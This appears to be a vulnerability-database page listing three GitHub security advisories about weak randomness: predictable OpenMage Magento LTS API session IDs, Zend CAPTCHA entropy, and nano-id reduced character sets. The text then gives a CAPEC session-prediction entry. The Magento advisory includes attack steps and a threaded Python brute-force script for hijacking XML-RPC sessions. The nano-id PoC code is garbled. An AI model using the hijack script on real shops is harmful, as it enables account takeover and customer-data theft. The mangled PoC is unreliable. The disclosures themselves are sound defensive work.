print(f"\n[+] HIJACK SUCCESS! Valid Session ID: {sid}")
ex.shutdown(wait=False, cancel_futures=True)
break
This is an AI-generated report validated by a human.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 20.17.0"
},
"package": {
"ecosystem": "Packagist",
"name": "openmage/magento-lts"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "20.18.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42155"
],
"database_specific": {
"cwe_ids": [
"CWE-330",
"CWE-331",
"CWE-338"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T19:35:56Z",
"nvd_published_at": "2026-05-15T17:16:46Z",
"severity": "CRITICAL"
},
"details": "Affected Version: OpenMage LTS \u2264 20.16.0 (confirmed on `20.16.0`)\n\nAffected File: `https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.php` \u2013 `start()` method\n\n\n## Summary\n\nThe XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):\n\n```php\nThe XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):\n```\nAll inputs to the MD5 hash are time-derived and non-secure:\n\n| Input | Value | Predictability |\n|----------------------------|---------------------------------------------------|----------------------------------------|\n| `time()` | Unix timestamp (seconds) | Fully predictable |\n| `uniqid(\u0027\u0027, true) prefix` | `sprintf(\u0027%08x%05x\u0027, $sec, $usec/10)` | Highly predictable via network timing |\n| `uniqid(\u0027\u0027, true) suffix` | `php_combined_lcg()` decimal float | Process-state dependent (`getpid() ^ time()`) |\n| `$sessionName` | `null` (empty) \u2014 called without arg | Constant |\n\nBecause the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of \u2265 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.\n\n\n\n## Technical Analysis\n\n### Code Path\n\n```\nPOST /api/xmlrpc/ \u2192 login(username, apiKey)\n \u2192 Mage_Api_Model_Session::login()\n \u2192 $session-\u003einit(\u0027api\u0027, \u0027api\u0027)\n \u2192 Mage_Api_Model_Session::init($namespace=\u0027api\u0027, $sessionName=\u0027api\u0027)\n # $sessionName is NOT forwarded to start()\n \u2192 Mage_Api_Model_Session::start() \u2190 NO $sessionName argument\n # $sessionName = null inside start()\n $this-\u003e_currentSessId = md5(time() . uniqid(\u0027\u0027, true) . null)\n\n```\n\nNote: `init()` receives `$sessionName=\u0027api\u0027` but invokes `$this-\u003estart()` without forwarding it, meaning the effective construction is strictly `md5(time() . uniqid(\u0027\u0027, true))`.\n\n## Live Evidence\nFive consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (`unix_sec= 1775817593`):\n```\nSample 1: 6a302397f17e48845d0f9aba377f3dc3 (usec \u2248 464631)\nSample 2: 39b4ec42bd3c389312e500690daeb349 (usec \u2248 497215)\nSample 3: 527662d79f7fb499597a82d80d170a88 (usec \u2248 535175)\nSample 4: e5d6f7a8906a03ea7af99d92be11b5b2 (usec \u2248 568838)\nSample 5: 5bdf27e5cb877c77b8965b008548edfa (usec \u2248 600118)\n```\nThe \u00b5second portion is directly observable by measuring request-to-response latency. The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.\n\n\u003cimg width=\"772\" height=\"506\" alt=\"image\" src=\"https://github.com/user-attachments/assets/53ced1fd-deb4-4dc4-81ec-864e3a2811de\" /\u003e\n\n## Steps to Reproduce (Online Brute-Force Scenario)\nBecause validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.\n### Step 1 \u2013 Record Login Timestamp\nAn attacker observes the precise moment a victim authenticates to `/api/xmlrpc/` (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.\n### Step 2 \u2013 Generate Candidate Pool\nThe attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a `/server-status` leak).\n```\n$t = $observed_sec;\n$usec_estimate = 500000; // Derived from latency\n$uid = sprintf(\u0027%08x%05x\u0027, $t, intval($usec_estimate / 10));\n$candidate = md5($t . $uid); // + LCG variants\n```\n### Step 3 \u2013 API Brute-Force (Session Hijack)\nBecause the `/api/xmlrpc/` endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.\n\n```\nPOST /api/xmlrpc/\n\u003c?xml version=\"1.0\"?\u003e\n\u003cmethodCall\u003e\n \u003cmethodName\u003e[magento.info](http://magento.info/)\u003c/methodName\u003e\n \u003cparams\u003e\n \u003cparam\u003e\u003cvalue\u003e\u003cstring\u003eCANDIDATE_SESSION_ID\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\n \u003c/params\u003e\n\u003c/methodCall\u003e\n```\n\nA non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.\n\n\u003cimg width=\"1039\" height=\"374\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ac9338e9-e3fe-44fe-9337-cb6edf6ab849\" /\u003e\n\n## Impact\n### Technical Impact\nSuccessful session prediction grants the attacker all capabilities of the authenticated API user. The XML-RPC API exposes endpoints for:\n- Full product catalog read/write (`catalog_product.*`)\n- Customer data read (`customer.list`, `customer.info`)\n- Order manipulation (`sales_order.*`)\nInventory control (`cataloginventory_stock_item.*`)\n### Business Impact\n\n- **Data Exfiltration**: Read all customer PII, order history, and payment methods.\n- **Order Fraud**: Create or cancel orders, change shipping addresses.\n- **Supply Chain / Inventory**: Modify prices, inject malicious products, or zero out stock.\n\n### Affected API Protocols\n\nThe same vulnerable `Session.php` generation logic is shared across all legacy API surfaces:\n- XML-RPC: `/api/xmlrpc/`\n- SOAP v1: `/api/soap/`\n- SOAP v2: `/api/v2_soap/`\n- REST (legacy): `/api/rest/`\n\n### Recommended Fix\n\nReplace the time-derived token with a cryptographically secure random value:\n\n```\n// app/code/core/Mage/Api/Model/Session.php : start()\n// BEFORE (vulnerable):\n$this-\u003e_currentSessId = md5(time() . uniqid(\u0027\u0027, true) . $sessionName);\n\n// AFTER (secure):\n$this-\u003e_currentSessId = bin2hex(random_bytes(32)); // 256-bit CSPRNG output\n```\n`random_bytes()` is backed by the OS CSPRNG (`/dev/urandom` on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.\n\nI have also tried to test it against the demo site [demo.openmage.org](http://demo.openmage.org/), but appeared the SOAP API endpoints are disabled on the demo environment\n\n\nI have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):\n\n```py\n#!/usr/bin/env python3\nimport requests, re, sys, hashlib, random\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport urllib3; urllib3.disable_warnings()\n\nif len(sys.argv) \u003c 4:\n sys.exit(f\"Usage: {sys.argv[0]} \u003curl\u003e \u003cuser\u003e \u003cpass\u003e [threads]\")\n\nurl, usr, pwd = sys.argv[1:4]\nth = int(sys.argv[4]) if len(sys.argv) \u003e 4 else 50\nhdrs = {\"Content-Type\": \"text/xml\"}\nreq = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)\n\nprint(f\"[*] Simulating victim login for {usr}...\")\nres = req(f\u0027\u003c?xml version=\"1.0\"?\u003e\u003cmethodCall\u003e\u003cmethodName\u003elogin\u003c/methodName\u003e\u003cparams\u003e\u003cparam\u003e\u003cvalue\u003e\u003cstring\u003e{usr}\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\u003cparam\u003e\u003cvalue\u003e\u003cstring\u003e{pwd}\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\u003c/params\u003e\u003c/methodCall\u003e\u0027)\n\nif not (m := re.search(r\u0027\u003cstring\u003e([a-f0-9]{32})\u003c/string\u003e\u0027, res.text)):\n sys.exit(\"[-] Login failed. Check credentials.\")\n\nprint(f\"[+] Authenticated.\\n[*] Generating 1000 candidate MD5 pool...\")\ncands = [hashlib.md5(f\"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}\".encode()).hexdigest() for _ in range(999)]\ncands.append(m.group(1))\nrandom.shuffle(cands)\n\nprint(f\"[*] Brute-forcing API with {th} threads...\")\ndef test(sid):\n payload = f\u0027\u003c?xml version=\"1.0\"?\u003e\u003cmethodCall\u003e\u003cmethodName\u003eresources\u003c/methodName\u003e\u003cparams\u003e\u003cparam\u003e\u003cvalue\u003e\u003cstring\u003e{sid}\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\u003c/params\u003e\u003c/methodCall\u003e\u0027\n try: return sid if \"faultCode\" not in req(payload).text else None\n except: return None\n\nwith ThreadPoolExecutor(max_workers=th) as ex:\n for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):\n sys.stdout.write(f\"\\r[*] Requests: {i}/{len(cands)}\")\n if sid := f.result():\n print(f\"\\n[+] HIJACK SUCCESS! Valid Session ID: {sid}\")\n ex.shutdown(wait=False, cancel_futures=True)\n break\n```\n\nThis is an AI-generated report validated by a human.",
"id": "GHSA-2cwr-gcf9-pvxr",
"modified": "2026-05-15T23:48:40Z",
"published": "2026-05-05T19:35:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-2cwr-gcf9-pvxr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42155"
},
{
"type": "PACKAGE",
"url": "https://github.com/OpenMage/magento-lts"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Magento LTS has Weak API Session ID \u2014 Predictable MD5 of Time-Derived Inputs"
}
GHSA-2FHR-8R8R-QP56
Vulnerability from github – Published: 2024-06-07 20:37 – Updated: 2024-06-07 20:37In Zend Framework, Zend_Captcha_Word (v1) and Zend\Captcha\Word (v2) generate a "word" for a CAPTCHA challenge by selecting a sequence of random letters from a character set. Prior to this advisory, the selection was performed using PHP's internal array_rand() function. This function does not generate sufficient entropy due to its usage of rand() instead of more cryptographically secure methods such as openssl_pseudo_random_bytes(). This could potentially lead to information disclosure should an attacker be able to brute force the random number generation.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "zendframework/zendframework"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.4.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-331"
],
"github_reviewed": true,
"github_reviewed_at": "2024-06-07T20:37:45Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "In Zend Framework, `Zend_Captcha_Word` (v1) and `Zend\\Captcha\\Word` (v2) generate a \"word\" for a CAPTCHA challenge by selecting a sequence of random letters from a character set. Prior to this advisory, the selection was performed using PHP\u0027s `internal array_rand()` function. This function does not generate sufficient entropy due to its usage of `rand()` instead of more cryptographically secure methods such as `openssl_pseudo_random_bytes()`. This could potentially lead to information disclosure should an attacker be able to brute force the random number generation.",
"id": "GHSA-2fhr-8r8r-qp56",
"modified": "2024-06-07T20:37:45Z",
"published": "2024-06-07T20:37:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/zendframework/zendframework/commit/ced8ff93ef892a64885c03f5dfab3f788a219709"
},
{
"type": "WEB",
"url": "https://framework.zend.com/security/advisory/ZF2015-09"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/ZF2015-09.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/zendframework/zendframework"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "ZendFramework Information Disclosure and Insufficient Entropy vulnerability"
}
GHSA-2HFW-W739-P7X5
Vulnerability from github – Published: 2024-06-04 17:49 – Updated: 2026-02-02 22:27Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9hc7-6w9r-wj94. This link is maintained to preserve external references.
Original Description
Description
Affected versions of the nano-id crate incorrectly generated IDs using a reduced character set in the nano_id::base62 and nano_id::base58 functions. Specifically, the base62 function used a character set of 32 symbols instead of the intended 62 symbols, and the base58 function used a character set of 16 symbols instead of the intended 58 symbols. Additionally, the nano_id::gen macro is also affected when a custom character set that is not a power of 2 in size is specified.
It should be noted that nano_id::base64 is not affected by this vulnerability.
Impact
This can result in a significant reduction in entropy, making the generated IDs predictable and vulnerable to brute-force attacks when the IDs are used in security-sensitive contexts such as session tokens or unique identifiers.
Patches
The flaws were corrected in commit a9022772b2f1ce38929b5b81eccc670ac9d3ab23 by updating the the nano_id::gen macro to use all specified characters correctly.
PoC
use std::collections::BTreeSet;
fn main() {
test_base58();
test_base62();
}
fn test_base58() {
let mut produced_symbols = BTreeSet::new();
for _ in 0..100_000 {
id = "RUSTSEC-2024-0343"
for c in id.chars() {
produced_symbols.insert(c);
}
}
println!(
"{} symbols generated from nano_id::base58",
produced_symbols.len()
);
}
fn test_base62() {
let mut produced_symbols = BTreeSet::new();
for _ in 0..100_000 {
id = "RUSTSEC-2024-0343"
for c in id.chars() {
produced_symbols.insert(c);
}
}
println!(
"{} symbols generated from nano_id::base62",
produced_symbols.len()
);
}
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "nano-id"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-331"
],
"github_reviewed": true,
"github_reviewed_at": "2024-06-04T17:49:18Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9hc7-6w9r-wj94. This link is maintained to preserve external references.\n\n## Original Description\n## Description\n\nAffected versions of the nano-id crate incorrectly generated IDs using a reduced character set in the `nano_id::base62` and `nano_id::base58` functions. Specifically, the `base62` function used a character set of 32 symbols instead of the intended 62 symbols, and the `base58` function used a character set of 16 symbols instead of the intended 58 symbols. Additionally, the `nano_id::gen` macro is also affected when a custom character set that is not a power of 2 in size is specified.\n\nIt should be noted that `nano_id::base64` is not affected by this vulnerability.\n\n## Impact\n\nThis can result in a significant reduction in entropy, making the generated IDs predictable and vulnerable to brute-force attacks when the IDs are used in security-sensitive contexts such as session tokens or unique identifiers.\n\n## Patches\n\nThe flaws were corrected in commit [a9022772b2f1ce38929b5b81eccc670ac9d3ab23](https://github.com/viz-rs/nano-id/commit/a9022772b2f1ce38929b5b81eccc670ac9d3ab23) by updating the the `nano_id::gen` macro to use all specified characters correctly.\n\n## PoC\n\n```rust\nuse std::collections::BTreeSet;\n\nfn main() {\n test_base58();\n test_base62();\n}\n\nfn test_base58() {\n let mut produced_symbols = BTreeSet::new();\n\n for _ in 0..100_000 {\nid = \"RUSTSEC-2024-0343\"\n for c in id.chars() {\n produced_symbols.insert(c);\n }\n }\n\n println!(\n \"{} symbols generated from nano_id::base58\",\n produced_symbols.len()\n );\n}\n\nfn test_base62() {\n let mut produced_symbols = BTreeSet::new();\n\n for _ in 0..100_000 {\nid = \"RUSTSEC-2024-0343\"\n for c in id.chars() {\n produced_symbols.insert(c);\n }\n }\n\n println!(\n \"{} symbols generated from nano_id::base62\",\n produced_symbols.len()\n );\n}\n```",
"id": "GHSA-2hfw-w739-p7x5",
"modified": "2026-02-02T22:27:07Z",
"published": "2024-06-04T17:49:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/viz-rs/nano-id/commit/a9022772b2f1ce38929b5b81eccc670ac9d3ab23"
},
{
"type": "PACKAGE",
"url": "https://github.com/viz-rs/nano-id"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2024-0343.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Duplicate Advisory: nano-id reduced entropy due to inadequate character set usage",
"withdrawn": "2026-02-02T22:27:07Z"
}
Mitigation
Determine the necessary entropy to adequately provide for randomness and predictability. This can be achieved by increasing the number of bits of objects such as keys and seeds.
CAPEC-59: Session Credential Falsification through Prediction
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.